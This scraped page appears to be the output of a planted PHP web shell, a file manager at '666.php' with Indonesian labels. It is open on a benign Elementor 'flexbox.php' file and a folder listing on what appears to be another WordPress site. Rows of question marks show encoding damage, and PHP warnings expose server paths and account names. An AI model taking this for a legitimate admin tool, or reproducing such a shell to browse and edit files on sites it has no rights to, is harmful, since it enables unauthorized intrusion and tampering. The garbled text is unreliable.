??????????????
??????????????
??????????????
??????????????
Warning : Undefined variable $auth in /home/u627560552/domains/kovexadvisory.com/public_html/666.php on line 546
Warning : Trying to access array offset on value of type null in /home/u627560552/domains/kovexadvisory.com/public_html/666.php on line 546
??????????????
??????????????
??????????????
??????????????
File Manager
✏️ Edit File: /home/mklsvubc/pyan.co.uk/wp-content/plugins/elementor/modules/atomic-widgets/library/flexbox.php
⬅ Kembali
<?php
namespace Elementor\Modules\AtomicWidgets\Library;
use Elementor\Modules\Library\Documents\Library_Document;
if ( ! defined( 'ABSPATH' ) ) {
exit; // Exit if accessed directly.
}
/**
* Elementor Flexbox library document.
*
* Elementor flexbox library document handler class is responsible for
* handling a document of a flexbox type.
*
* @since 3.29.0
*/
class Flexbox extends Library_Document {
public static function get_properties() {
$properties = parent::get_properties();
$properties['support_kit'] = true;
return $properties;
}
/**
* Get document name.
*
* Retrieve the document name.
*
* @since 2.0.0
* @access public
*
* @return string Document name.
*/
public function get_name() {
return 'e-flexbox';
}
/**
* Get document title.
*
* Retrieve the document title.
*
* @since 2.0.0
* @access public
* @static
*
* @return string Document title.
*/
public static function get_title() {
return esc_html__( 'Flexbox', 'elementor' );
}
/**
* Get Type
*
* Return the flexbox document type.
*
* @return string
*/
public static function get_type() {
return 'e-flexbox';
}
}
Nama
Tipe
Ukuran
Diubah
Aksi
🐘 atomic-form.php
php
1.2 KB
2026-06-21 17:18
🐘 atomic-widgets-library.php
php
545 B
2026-06-21 17:18
🐘 div-block.php
php
1.2 KB
2025-09-15 14:10
🐘 flexbox.php
php
1.1 KB
2025-09-15 14:10